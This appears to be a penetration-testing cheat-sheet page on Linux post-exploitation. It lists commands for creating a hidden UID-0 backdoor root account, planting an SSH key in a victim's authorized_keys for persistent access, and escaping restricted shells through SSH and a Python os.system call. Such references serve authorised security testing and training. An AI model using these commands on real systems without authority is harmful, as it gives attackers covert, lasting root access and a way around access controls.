Linux
Introduction
In this section, you will find several useful commands for the Post-Exploitation phase in Linux systems.
User
Creating a user
sudo useradd [-m] <USERNAME>
Add a user to a group
sudo usermod -aG <GROUP> <USERNAME>
Create an alternative root user
useradd -m -ou 0 -g 0 -p <ENCRYPTED_PASSWORD> -s /bin/bash <USERNAME>
Login through SSH
There are times when we have a remote terminal as a user but we want to have access as that user via SSH although we do not know their password. SSH keys are used for these cases.
Generate a SSH key pair.
kali@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
[...]
Add the public key to the victim's file
~/.ssh/authorized_keys
:
echo -e "\n<PUB_KEY>\n" >> ~/.ssh/authorized_keys
Log in.
ssh -i ~/.ssh/id_rsa <USERNAME>@<IP>
Shell Escapes
It could be the case that you have obtained access to a restricted shell allowing you to perform a minimal amount of commands and preventing you from accessing other directories or files.
In this section, you will find some ways to escape those restricted shells.
SSH
ssh <USERNAME>@<TARGET_I -t "bash --noprofile -i"
Python Jail
echo os.system('/bin/bash')
For more examples of how to escape restricted shells, read the following articles.
Last updated